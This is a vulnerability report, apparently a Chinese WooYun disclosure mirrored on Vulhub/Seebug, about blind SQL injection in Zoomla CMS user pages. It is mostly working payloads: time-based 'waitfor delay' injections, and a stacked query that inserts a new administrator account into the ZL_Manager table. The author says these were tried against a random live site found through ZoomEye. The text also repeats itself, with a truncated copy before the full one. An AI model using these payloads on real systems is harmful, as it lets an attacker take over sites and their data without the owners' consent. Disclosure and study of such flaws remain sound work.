VULHUB ™

### 简要描述： RT ### 详细说明： 虽然说故障页面还是有部分和WooYun-2014-56963相同，但是那个仅仅是提取普通会员权限，最后经过反编译，然后白盒审计，发现多处可以盲注，直接加入管理员 页面1： ``` http://demo.zoomla.cn/user/AppBack.aspx?type=QQ&openID= ``` 依然是这个页面逻辑判断有问题。 页面2： ``` http://demo.zoomla.cn/user/UpdateMailChk.aspx?username=1&mail=1 ``` ### 漏洞证明： 页面1： [<img src="https://images.seebug.org/upload/201404/18170110b7050201fe0fc898ce5c89f2b5cffc1f.jpg" alt="poc" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/18170110b7050201fe0fc898ce5c89f2b5cffc1f.jpg) 可以在用户名中输入 ``` this1','this1','','','',1);waitfor/**/delay/**/'0:00:10'-- ``` 然后该怎么搞就怎么搞了 [<img src="https://images.seebug.org/upload/201404/18203321ad36195c700e3598dd9dad06d22dc779.jpg" alt="1" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/18203321ad36195c700e3598dd9dad06d22dc779.jpg) 强行加入管理员表方法： 用户名中输入以下数据： ``` this1%27%2C%27this1%27%2C%27%27%2C%27%27%2C%27%27%2C1%29%3BINSERT/**/INTO/**/[dbo].[ZL_Manager]...

### 简要描述： RT ### 详细说明： 虽然说故障页面还是有部分和WooYun-2014-56963相同，但是那个仅仅是提取普通会员权限，最后经过反编译，然后白盒审计，发现多处可以盲注，直接加入管理员 页面1： ``` http://demo.zoomla.cn/user/AppBack.aspx?type=QQ&openID= ``` 依然是这个页面逻辑判断有问题。 页面2： ``` http://demo.zoomla.cn/user/UpdateMailChk.aspx?username=1&mail=1 ``` ### 漏洞证明： 页面1： [<img src="https://images.seebug.org/upload/201404/18170110b7050201fe0fc898ce5c89f2b5cffc1f.jpg" alt="poc" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/18170110b7050201fe0fc898ce5c89f2b5cffc1f.jpg) 可以在用户名中输入 ``` this1','this1','','','',1);waitfor/**/delay/**/'0:00:10'-- ``` 然后该怎么搞就怎么搞了 [<img src="https://images.seebug.org/upload/201404/18203321ad36195c700e3598dd9dad06d22dc779.jpg" alt="1" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/18203321ad36195c700e3598dd9dad06d22dc779.jpg) 强行加入管理员表方法： 用户名中输入以下数据： ``` this1%27%2C%27this1%27%2C%27%27%2C%27%27%2C%27%27%2C1%29%3BINSERT/**/INTO/**/[dbo].[ZL_Manager] ([AdminName],[AdminPassword],[UserName],[EnableMultiLogin],[IsLock],[AdminRole],[AdminType],[AdminTrueName],[AddUserID])/**/VALUES/**/('wooyuntest2','202cb962ac59075b964b07152d234b70','wooyuntest2',1,0,'1',1,'wooyuntest2','1')-- ``` zoomeye随便抓了个站来试的： [<img src="https://images.seebug.org/upload/201404/182231552ce85f8b8a7548bc647bb0a181cb1a1a.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/182231552ce85f8b8a7548bc647bb0a181cb1a1a.jpg) 页面2： ``` http://demo.zoomla.cn/user/UpdateMailChk.aspx?username=1&mail=2' where UserName='1';waitfor delay '0:00:03'-- ``` 上面UserName需要匹配自己当前登陆的用户 这个页面需要登陆后才能用 [<img src="https://images.seebug.org/upload/201404/18203425e0f56e121bff780e58d58280c60063a0.jpg" alt="2" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/18203425e0f56e121bff780e58d58280c60063a0.jpg)